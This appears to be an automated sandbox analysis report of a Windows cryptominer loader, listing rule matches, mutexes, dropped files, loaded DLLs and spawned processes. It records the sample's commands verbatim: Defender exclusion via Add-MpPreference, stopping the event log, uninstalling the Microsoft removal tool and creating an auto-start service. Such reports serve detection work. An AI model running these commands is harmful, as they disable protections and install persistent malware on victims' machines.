Source: 00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 2120, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: gtebvdararzg.sys.18.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.evad.mine.winEXE@38/12@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF72877D5F0 memset,GetModuleHandleW,FormatMessageW,GetLastError,

0_2_00007FF72877D5F0

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Global\urmtbcjngppibwna
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmgre3nn.jyw.ps1

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 44%

Source: nlkuzmdacjrb.exe

String found in binary or memory: zT+KKvYG+8OHa88Rzf2NDmRX1ZBVFrA3eyoz0eM/4pyt34L4/QjwdU4dbhPGMWLFdlzURLtrE+iWJEEGIvnkc/9+mLTUxvsXYOA+mVAw/rEQWUD3JHzuUnG2X3cjUJ8ejrf3/36V/OUx10FQR8uJfqlB0LYjogYywgVksUe+1JTeScV4FajnAZahgfI9xpgw29oGBrN2A/IzRYuZfkPzw1OyIwlh//iXY0KyA/L/aDDf0lIiA+LWRmBVVU8mGRZ3P3PC

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\notepad.exe notepad.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "MXOLIHZI"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "MXOLIHZI"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\notepad.exe notepad.exe
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\notepad.exe notepad.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "MXOLIHZI"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "MXOLIHZI"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\notepad.exe notepad.exe	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\conhost.exe conhost.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 3779584 > 1048576

Source: file.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x37a800

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr
Source:	Binary string: ad.pdb" source: file.exe, nlkuzmdacjrb.exe.0.dr
Source:	Binary string: ad.pdb source: file.exe, nlkuzmdacjrb.exe.0.dr

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF72877F4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,

0_2_00007FF72877F4E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001BB80981394 push dword ptr [00008C01h]; ret	0_2_000001BB80981403
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00000122A4921394 push dword ptr [00008C01h]; ret	18_2_00000122A4921403
Source: C:\Windows\System32\conhost.exe	Code function: 23_2_0000000140001394 push qword ptr [0000000140009004h]; ret	23_2_0000000140001403

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

File created: C:\Windows\TEMP\gtebvdararzg.sys

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe			Jump to dropped file
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	File created: C:\Windows\Temp\gtebvdararzg.sys			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

Jump to dropped file

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

File created: C:\Windows\Temp\gtebvdararzg.sys

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "MXOLIHZI"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
